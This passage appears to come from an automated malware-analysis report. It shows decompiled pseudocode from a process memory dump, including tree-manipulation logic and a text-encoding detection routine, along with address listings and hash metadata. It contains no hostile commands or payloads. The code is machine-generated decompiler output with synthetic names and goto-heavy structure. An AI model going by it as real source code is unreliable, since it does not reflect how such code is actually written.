													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                          0x033bb095
                                          0x033bb09b
                                          0x033bb09f
                                          0x033bb0a5
                                          0x033bb0a7
                                          0x033bb0aa
                                          0x033bb0ad
                                          0x033bb0b1
                                          0x033bb3f8
                                          0x033bb3fa
                                          0x033bb3ff
                                          0x033bb419
                                          0x033bb41b
                                          0x033bb41b
                                          0x033bb401
                                          0x00000000
                                          0x033bb0b7
                                          0x033bb0b9
                                          0x033bb0bc
                                          0x033bb0c0
                                          0x033bb0c2
                                          0x033bb0c2
                                          0x033bb0c4
                                          0x033bb0c8
                                          0x033bb0cf
                                          0x033bb0d1
                                          0x033bb0d1
                                          0x033bb0da
                                          0x033bb0dd
                                          0x033bb0df
                                          0x033bb0df
                                          0x033bb0e4
                                          0x033bb0e9
                                          0x033bb3e2
                                          0x033bb3e5
                                          0x033bb3eb
                                          0x0340a676
                                          0x0340a67b
                                          0x0340a67d
                                          0x033bb3f1
                                          0x033bb3f1
                                          0x033bb3f1
                                          0x033bb0ef
                                          0x033bb0ef
                                          0x033bb0ef
                                          0x033bb0e9
                                          0x033bb0f6
                                          0x033bb28d
                                          0x033bb28e
                                          0x033bb293
                                          0x033bb0fc
                                          0x033bb0fc
                                          0x033bb101
                                          0x033bb104
                                          0x033bb107
                                          0x033bb10c
                                          0x0340a687
                                          0x0340a68d
                                          0x0340a68d
                                          0x0340a687
                                          0x033bb112
                                          0x033bb116
                                          0x0340a696
                                          0x0340a69c
                                          0x0340a69c
                                          0x0340a696
                                          0x033bb120
                                          0x033bb121
                                          0x033bb124
                                          0x033bb127
                                          0x033bb12a
                                          0x033bb12d
                                          0x033bb132
                                          0x0340a6a5
                                          0x00000000
                                          0x00000000
                                          0x0340a6ab
                                          0x00000000
                                          0x033bb138
                                          0x033bb138
                                          0x033bb13a
                                          0x033bb193
                                          0x033bb197
                                          0x033bb19d
                                          0x033bb29c
                                          0x033bb29f
                                          0x033bb2a2
                                          0x033bb2a7
                                          0x0340a6d2
                                          0x0340a6d8
                                          0x0340a6d8
                                          0x0340a6d2
                                          0x033bb2af
                                          0x033bb420
                                          0x033bb422
                                          0x033bb423
                                          0x00000000
                                          0x033bb2b5
                                          0x033bb2b5
                                          0x033bb2ba
                                          0x0340a6e1
                                          0x0340a6e7
                                          0x0340a6e7
                                          0x0340a6e1
                                          0x033bb2c2
                                          0x00000000
                                          0x033bb2c8
                                          0x033bb2cb
                                          0x033bb2d0
                                          0x0340a6f0
                                          0x0340a6f6
                                          0x0340a6f6
                                          0x0340a6f0
                                          0x033bb2d8
                                          0x00000000
                                          0x033bb2de
                                          0x033bb2de
                                          0x033bb2de
                                          0x033bb2e1
                                          0x033bb2e6
                                          0x033bb2eb
                                          0x0340a6ff
                                          0x0340a705
                                          0x0340a705
                                          0x0340a6ff
                                          0x033bb2f3
                                          0x00000000
                                          0x033bb2f9
                                          0x033bb2fb
                                          0x033bb2fd
                                          0x033bb301
                                          0x033bb303
                                          0x033bb303
                                          0x033bb308
                                          0x033bb30b
                                          0x033bb310
                                          0x033bb312
                                          0x033bb312
                                          0x033bb31c
                                          0x033bb322
                                          0x033bb327
                                          0x0340a70e
                                          0x033bb335
                                          0x033bb337
                                          0x0340a71d
                                          0x0340a723
                                          0x0340a723
                                          0x0340a71d
                                          0x033bb340
                                          0x033bb345
                                          0x033bb349
                                          0x0340a72a
                                          0x0340a72a
                                          0x033bb352
                                          0x033bb357
                                          0x033bb359
                                          0x033bb359
                                          0x033bb365
                                          0x033bb367
                                          0x033bb36c
                                          0x00000000
                                          0x033bb36c
                                          0x0340a714
                                          0x0340a714
                                          0x033bb32f
                                          0x033bb3b8
                                          0x033bb3bd
                                          0x033bb3c4
                                          0x033bb425
                                          0x033bb427
                                          0x033bb429
                                          0x033bb429
                                          0x033bb427
                                          0x033bb3c8
                                          0x00000000
                                          0x00000000
                                          0x033bb3ce
                                          0x033bb42f
                                          0x033bb3d0
                                          0x033bb3d0
                                          0x033bb3d0
                                          0x033bb3d7
                                          0x033bb3da
                                          0x033bb3da
                                          0x00000000
                                          0x033bb32f
                                          0x033bb2f3
                                          0x033bb2d8
                                          0x033bb2c2
                                          0x033bb2af
                                          0x033bb1a3
                                          0x033bb1a9
                                          0x033bb1af
                                          0x033bb1b2
                                          0x033bb1b5
                                          0x033bb1b8
                                          0x0340a733
                                          0x0340a739
                                          0x0340a739
                                          0x0340a733
                                          0x033bb1c0
                                          0x00000000
                                          0x033bb1c6
                                          0x033bb1c8
                                          0x033bb1cb
                                          0x033bb1ce
                                          0x033bb1d3
                                          0x0340a742
                                          0x0340a748
                                          0x0340a748
                                          0x0340a742
                                          0x033bb1db
                                          0x00000000
                                          0x033bb1e1
                                          0x033bb1e1
                                          0x033bb1e6
                                          0x033bb1e9
                                          0x033bb1ee
                                          0x0340a751
                                          0x033bb409
                                          0x033bb409
                                          0x033bb40e
                                          0x00000000
                                          0x00000000
                                          0x033bb410
                                          0x033bb22d
                                          0x033bb22f
                                          0x0340a790
                                          0x0340a796
                                          0x0340a796
                                          0x0340a790
                                          0x033bb23d
                                          0x033bb243
                                          0x033bb248
                                          0x0340a79f
                                          0x00000000
                                          0x00000000
                                          0x0340a7a5
                                          0x00000000
                                          0x033bb24e
                                          0x033bb24e
                                          0x033bb250
                                          0x033bb374
                                          0x033bb379
                                          0x033bb37e
                                          0x0340a7ae
                                          0x0340a7b4
                                          0x0340a7b4
                                          0x0340a7ae
                                          0x033bb386
                                          0x00000000
                                          0x033bb38c
                                          0x033bb38e
                                          0x0340a7bd
                                          0x033bb394
                                          0x033bb394
                                          0x033bb394
                                          0x033bb39b
                                          0x033bb39e
                                          0x00000000
                                          0x033bb39e
                                          0x033bb386
                                          0x033bb256
                                          0x033bb258
                                          0x0340a7c6
                                          0x0340a7cc
                                          0x0340a7cc
                                          0x0340a7c6
                                          0x033bb261
                                          0x033bb266
                                          0x033bb26a
                                          0x0340a7d3
                                          0x0340a7d3
                                          0x033bb273
                                          0x033bb278
                                          0x033bb27a
                                          0x033bb27a
                                          0x033bb281
                                          0x033bb283
                                          0x033bb285
                                          0x033bb287
                                          0x033bb289
                                          0x00000000
                                          0x033bb289
                                          0x033bb248
                                          0x0340a757
                                          0x0340a757
                                          0x033bb1f6
                                          0x00000000
                                          0x00000000
                                          0x033bb1fc
                                          0x033bb201
                                          0x0340a760
                                          0x0340a766
                                          0x0340a766
                                          0x0340a760
                                          0x033bb209
                                          0x033bb3a8
                                          0x0340a76f
                                          0x033bb3ae
                                          0x033bb3ae
                                          0x033bb3ae
                                          0x033bb3b0
                                          0x00000000
                                          0x033bb20f
                                          0x033bb20f
                                          0x033bb213
                                          0x0340a778
                                          0x0340a77e
                                          0x0340a77e
                                          0x0340a778
                                          0x033bb21b
                                          0x00000000
                                          0x033bb221
                                          0x033bb223
                                          0x0340a787
                                          0x033bb229
                                          0x033bb229
                                          0x033bb229
                                          0x033bb22b
                                          0x00000000
                                          0x033bb22b
                                          0x033bb21b
                                          0x033bb209
                                          0x033bb1db
                                          0x033bb142
                                          0x033bb142
                                          0x033bb146
                                          0x033bb148
                                          0x033bb14c
                                          0x033bb14f
                                          0x033bb154
                                          0x033bb15b
                                          0x0340a6b4
                                          0x00000000
                                          0x00000000
                                          0x0340a6ba
                                          0x0340a6ba
                                          0x033bb163
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033bb163
                                          0x033bb13a
                                          0x033bb169
                                          0x033bb16b
                                          0x033bb16e
                                          0x033bb171
                                          0x033bb175
                                          0x033bb178
                                          0x0340a6c3
                                          0x0340a6c9
                                          0x0340a6c9
                                          0x0340a6c3
                                          0x033bb180
                                          0x033bb184
                                          0x00000000
                                          0x033bb104
                                          0x033bb0f6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction ID: 7df194f88e69ffaf1a3c603f0ce3629f6919090a7dd4a85fe19361beecf09fcb
                                          • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction Fuzzy Hash: 16D1D431B147158BCB21CE29C9C02AAF7B9AF85254B2C85A9DE99CFB81EF71D8418750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A0D20, Relevance: .4, Instructions: 372COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E033A0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x3496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x3496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x3496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x33a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M033A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                          0x033a0d2b
                                          0x033a0d2e
                                          0x033a0d32
                                          0x033a0d39
                                          0x033a0d3b
                                          0x033a0d3d
                                          0x033a0d3f
                                          0x033a0d46
                                          0x033a0d4d
                                          0x033a0d54
                                          0x033a0d5b
                                          0x033a0d62
                                          0x033a0d69
                                          0x033a0d70
                                          0x033a0d77
                                          0x033a0d7e
                                          0x033a0d85
                                          0x033a0d88
                                          0x033a0d8b
                                          0x033a0d8e
                                          0x033a0d91
                                          0x033a0d94
                                          0x033a0d97
                                          0x033a0d9a
                                          0x033a0d9d
                                          0x033a0da6
                                          0x033a10e9
                                          0x033a10ee
                                          0x033a0db9
                                          0x033a0db9
                                          0x033a0dbc
                                          0x033fe9c7
                                          0x033fe9ca
                                          0x033fe9cd
                                          0x033fe9d0
                                          0x033fe9dd
                                          0x033fe9dd
                                          0x033a0dec
                                          0x033a0dec
                                          0x033a0dee
                                          0x033a0df3
                                          0x033a0ebf
                                          0x033a0ec0
                                          0x00000000
                                          0x033a0df9
                                          0x033a0df9
                                          0x033a0e1e
                                          0x033a0e21
                                          0x033a0e24
                                          0x033a0e27
                                          0x033a0e2a
                                          0x033a0e2d
                                          0x033a0e30
                                          0x033a0e36
                                          0x033a1040
                                          0x033a1043
                                          0x033a1049
                                          0x033a1049
                                          0x033a0e3c
                                          0x033a0e3f
                                          0x033a1007
                                          0x033a100a
                                          0x033a1010
                                          0x033a1010
                                          0x033a100a
                                          0x033a0e3f
                                          0x033a0e58
                                          0x033a0e5d
                                          0x033a1000
                                          0x033a0e63
                                          0x033a0e63
                                          0x033a0e63
                                          0x033a0e67
                                          0x033a0e69
                                          0x033a0e69
                                          0x033a0e6d
                                          0x033a0e70
                                          0x033a0e74
                                          0x033a0e76
                                          0x033a0e76
                                          0x033a0e7a
                                          0x033a0e7c
                                          0x033a0e7c
                                          0x033a0e83
                                          0x033a0e86
                                          0x033a0e87
                                          0x033a0e89
                                          0x033a0e8b
                                          0x033a0e91
                                          0x033a0e00
                                          0x033a0e03
                                          0x033a0e03
                                          0x033a0e07
                                          0x033a0e0f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0e0f
                                          0x033a0e97
                                          0x033a0e9c
                                          0x033a113e
                                          0x033a1141
                                          0x033a1143
                                          0x033a0eb1
                                          0x033a0eb1
                                          0x033a0eb4
                                          0x033a0eb6
                                          0x033a1110
                                          0x033a1112
                                          0x033fea25
                                          0x033fea25
                                          0x033a0ec3
                                          0x033a0ec3
                                          0x033a0ecb
                                          0x033a10fe
                                          0x033a0ed1
                                          0x033a0ed1
                                          0x033a0ed1
                                          0x033a0ed3
                                          0x033a0edb
                                          0x033fea2d
                                          0x033fea2f
                                          0x033fea31
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033fea37
                                          0x033fea37
                                          0x033fea3a
                                          0x033fea3e
                                          0x033fea47
                                          0x033fea4a
                                          0x033fea4c
                                          0x033fea4d
                                          0x033fea4d
                                          0x033fea4e
                                          0x033fea4e
                                          0x033fea51
                                          0x033fea52
                                          0x033fea52
                                          0x00000000
                                          0x033a0ee1
                                          0x033a0ee1
                                          0x033a0ee1
                                          0x033a0ee3
                                          0x033a0ee3
                                          0x033a0ee6
                                          0x033a0eec
                                          0x033fea5b
                                          0x033fea5d
                                          0x033a0ef6
                                          0x033a0ef8
                                          0x033fea6f
                                          0x033fea6f
                                          0x033a0efe
                                          0x033a0efe
                                          0x033a0f03
                                          0x033fea7b
                                          0x033fea7d
                                          0x00000000
                                          0x00000000
                                          0x033fea83
                                          0x033fea85
                                          0x00000000
                                          0x00000000
                                          0x033fea8b
                                          0x033fea91
                                          0x00000000
                                          0x00000000
                                          0x033fea97
                                          0x033fea9a
                                          0x033feaa0
                                          0x033feaa2
                                          0x033feaa2
                                          0x033feaae
                                          0x033feab3
                                          0x033feab6
                                          0x033feabf
                                          0x033feaca
                                          0x033feacd
                                          0x033fead1
                                          0x033fead1
                                          0x033feab8
                                          0x033feab8
                                          0x033feab8
                                          0x033fead2
                                          0x033fead9
                                          0x033a0f0e
                                          0x033a0f15
                                          0x033a0f17
                                          0x033a0f17
                                          0x033a0f1e
                                          0x033a0f23
                                          0x033feae1
                                          0x033feae1
                                          0x033a0f38
                                          0x033a0f3a
                                          0x033a0f3a
                                          0x033a0f49
                                          0x033a1108
                                          0x033a1108
                                          0x033a0f5b
                                          0x033a10c7
                                          0x033a10ca
                                          0x033a10cc
                                          0x00000000
                                          0x00000000
                                          0x033a10dc
                                          0x033a10de
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0f61
                                          0x033a0f61
                                          0x033a0f61
                                          0x033a0f67
                                          0x033a0f6b
                                          0x033a111d
                                          0x033a111d
                                          0x033a0f75
                                          0x033a0f77
                                          0x033a0f77
                                          0x033a0f85
                                          0x033a0f8b
                                          0x033a10b9
                                          0x033a10bc
                                          0x033feae9
                                          0x033feae9
                                          0x033a0f91
                                          0x033a0f91
                                          0x033a0f91
                                          0x033a0f96
                                          0x033a0f98
                                          0x033a0f9a
                                          0x033a0f9a
                                          0x033a0fa6
                                          0x033a107c
                                          0x033a107f
                                          0x033a108d
                                          0x00000000
                                          0x033a108d
                                          0x033a1081
                                          0x033a1087
                                          0x033feaf4
                                          0x033feafa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033feb00
                                          0x00000000
                                          0x033a0fac
                                          0x033a0fac
                                          0x00000000
                                          0x033a0fac
                                          0x033a0fa6
                                          0x033a0f5b
                                          0x033a0f09
                                          0x033a0f09
                                          0x00000000
                                          0x033a0f09
                                          0x033fea63
                                          0x00000000
                                          0x033fea63
                                          0x033a0ef4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0ef4
                                          0x033a0ebc
                                          0x033a0ebc
                                          0x00000000
                                          0x033a0ebc
                                          0x033a0eb6
                                          0x033a1149
                                          0x033a114c
                                          0x033a114d
                                          0x00000000
                                          0x033a114d
                                          0x033a0ea4
                                          0x033a0ea7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033a0fb7
                                          0x033a0fb7
                                          0x033a0fbc
                                          0x033a0fc9
                                          0x033a0fc9
                                          0x033a0fce
                                          0x033a1020
                                          0x033a1025
                                          0x033a1094
                                          0x033a1094
                                          0x033a1099
                                          0x033fea04
                                          0x033fea04
                                          0x033fea09
                                          0x033fea1c
                                          0x033fea0b
                                          0x033fea0b
                                          0x033fea0e
                                          0x033fea14
                                          0x033fea14
                                          0x033fea0e
                                          0x033fea09
                                          0x033a1027
                                          0x033a1027
                                          0x033a1155
                                          0x033a102d
                                          0x033a102d
                                          0x033a102d
                                          0x033a1032
                                          0x033fe9fc
                                          0x033fe9fc
                                          0x033a1032
                                          0x033a1027
                                          0x00000000
                                          0x033a1025
                                          0x033a0fd0
                                          0x033fe9f4
                                          0x00000000
                                          0x033fe9f4
                                          0x033a0fd6
                                          0x033a0fd9
                                          0x033a1059
                                          0x033a1059
                                          0x033a105e
                                          0x033fe9ec
                                          0x033a1064
                                          0x033a1064
                                          0x033a1064
                                          0x033a1069
                                          0x033a10ac
                                          0x033a106b
                                          0x033a106b
                                          0x033a106e
                                          0x033a1074
                                          0x033a1074
                                          0x033a106e
                                          0x033a1069
                                          0x00000000
                                          0x033a105e
                                          0x033a0fdb
                                          0x033a10a4
                                          0x00000000
                                          0x033a10a4
                                          0x033a0fe1
                                          0x033a0fe4
                                          0x00000000
                                          0x00000000
                                          0x033a0fea
                                          0x033a0ff1
                                          0x00000000
                                          0x033a0ff8
                                          0x00000000
                                          0x00000000
                                          0x033fe9e4
                                          0x00000000
                                          0x00000000
                                          0x033a1018
                                          0x00000000
                                          0x00000000
